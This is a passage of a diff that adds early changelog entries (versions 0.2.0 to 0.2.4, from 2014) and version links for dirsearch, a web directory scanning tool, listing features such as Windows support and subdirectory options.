|
107
|
+
|
108
|
+
## [0.2.4] - July 17, 2014
|
109
|
+
- Added Windows support
|
110
|
+
- `--scan-subdirs` argument added
|
111
|
+
- `--exclude-subdirs` added
|
112
|
+
- `--header` argument added
|
113
|
+
- Dirbuster dictionaries added
|
114
|
+
- Fixed some concurrency bugs
|
115
|
+
- MVC refactoring
|
116
|
+
|
117
|
+
## 0.2.3 - July 7, 2014
|
118
|
+
- Fixed some bugs
|
119
|
+
- Minor refactorings
|
120
|
+
- Exclude status switch
|
121
|
+
- Pause/next directory feature
|
122
|
+
- Changed help structure
|
123
|
+
- Expaded default dictionary
|
124
|
+
|
125
|
+
## 0.2.2 - July 2, 2014
|
126
|
+
- Fixed some bugs
|
127
|
+
- Showing percentage of tested paths and added report generation feature
|
128
|
+
|
129
|
+
## 0.2.1 - May 1, 2014
|
130
|
+
- Fixed some bugs and added recursive option
|
131
|
+
|
132
|
+
## 0.2.0 - January 31, 2014
|
133
|
+
- Initial public release
|
134
|
+
|
135
|
+
[Unreleased]: https://github.com/maurosoria/dirsearch/tree/master
|
136
|
+
[0.4.3]: https://github.com/maurosoria/dirsearch/tree/v0.4.3
|
137
|
+
[0.4.2]: https://github.com/maurosoria/dirsearch/tree/v0.4.2
|
138
|
+
[0.4.1]: https://github.com/maurosoria/dirsearch/tree/v0.4.1
|
139
|
+
[0.4.0]: https://github.com/maurosoria/dirsearch/tree/v0.4.0
|
140
|
+
[0.3.9]: https://github.com/maurosoria/dirsearch/tree/v0.3.9
|
141
|
+
[0.3.8]: https://github.com/maurosoria/dirsearch/tree/v0.3.8
|
142
|
+
[0.3.7]: https://github.com/maurosoria/dirsearch/tree/v0.3.7
|
143
|
+
[0.3.6]: https://github.com/maurosoria/dirsearch/tree/v0.3.6
|
144
|
+
[0.3.5]: https://github.com/maurosoria/dirsearch/tree/v0.3.5
|
145
|
+
[0.3.0]: https://github.com/maurosoria/dirsearch/tree/v0.3.0
|
146
|
+
[0.2.7]: https://github.com/maurosoria/dirsearch/tree/v0.2.7
|
147
|
+
[0.2.6]: https://github.com/maurosoria/dirsearch/tree/v0.2.6
|
148
|
+
[0.2.5]: https://github.com/maurosoria/dirsearch/tree/v0.2.5
|
149
|
+
[0.2.4]: https://github.com/maurosoria/dirsearch/tree/v0.2.4
|